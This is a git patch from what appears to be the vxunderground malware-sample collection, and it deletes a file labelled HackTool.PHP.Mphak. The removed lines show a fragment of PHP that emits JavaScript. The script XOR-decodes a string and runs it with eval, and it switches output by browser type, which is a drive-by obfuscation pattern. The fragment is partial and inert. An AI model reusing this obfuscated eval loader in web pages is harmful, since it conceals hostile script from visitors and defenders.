From d320ee005c24e32171ff42dbc5cf1f00fe79190a Mon Sep 17 00:00:00 2001 From: vxunderground <57078196+vxunderground@users.noreply.github.com> Date: Mon, 2 Nov 2020 23:37:46 -0600 Subject: [PATCH] Delete HackTool.PHP.Mphak.c --- PHP/HackTool.PHP.Mphak.c | 65 ---------------------------------------- 1 file changed, 65 deletions(-) delete mode 100644 PHP/HackTool.PHP.Mphak.c diff --git a/PHP/HackTool.PHP.Mphak.c b/PHP/HackTool.PHP.Mphak.c deleted file mode 100644 index 010b89b3..00000000 --- a/PHP/HackTool.PHP.Mphak.c +++ /dev/null @@ -1,65 +0,0 @@ -str = "'.$new.'";str2 = "";for (i = 0; i < str.length; i ++) { str2 = str2 + String.fromCharCode (str.charCodeAt (i) ^ 1); }; eval (str2);'; -} -if ($java == true) echo ''; -elseif ($browser == "MSIE") echo ''.encode ('').""; -elseif ($browser == "Opera") echo encode (''); -?> \ No newline at end of file